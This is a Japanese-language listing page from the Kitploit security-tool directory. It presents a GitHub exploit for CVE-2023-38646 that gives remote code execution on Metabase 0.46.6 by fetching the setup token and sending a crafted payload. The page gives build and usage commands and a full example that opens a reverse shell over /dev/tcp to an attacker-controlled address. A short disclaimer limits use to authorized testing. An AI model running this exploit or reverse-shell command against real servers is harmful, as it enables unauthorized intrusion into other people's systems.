Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — CVE-2023-38646 の Metabase 0.46.6 向けエクスプロイト。細工したリクエストとセットアップトークンの取得を介して、リモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/danithehack3r/cve-2023-38646
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセストロイの木馬
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

CVE-2023-38646 の Metabase 0.46.6 向けエクスプロイト。細工したリクエストとセットアップトークンの取得を介して、リモートコード実行を可能にします。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38646

CVE-2023-38646 Metabase 0.46.6 エクスプロイト

このツールは、ソフトウェアプラットフォームの脆弱性(CVE-2023-38646)を悪用します。このエクスプロイトは、不正に処理されたデータベース接続文字列を利用し、細工されたリクエストを介してリモートコード実行を可能にします。

概要

このツールは:

  • ターゲットURLからセットアップトークンを取得します。
  • 指定されたコマンドをBase64エンコードします。
  • エンコードされたコマンドを含むペイロードを構築します。
  • ペイロードを送信して脆弱性を悪用します。

インストール

リポジトリをクローンします:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

使用方法

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: スキャンおよび悪用対象となるプラットフォームのURL。 COMMAND: ターゲット上で実行するコマンド。 PROXY_URL (任意): プロキシサーバーのURL(例: http://127.0.0.1:8080)。指定しない場合、プロキシは使用されません。

shリバースシェルを使用した例

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

免責事項

このツールは教育および研究目的のみを意図しています。ターゲットをスキャンまたは悪用する前に、必ず適切な許可を得てください。このツールの誤用は開発者の意図に反し、違法となる可能性があります。

フィードバックと貢献

フィードバック、バグ、機能リクエストについては、お気軽にIssueを開いてください。プルリクエストはいつでも歓迎します!

ツールをダウンロード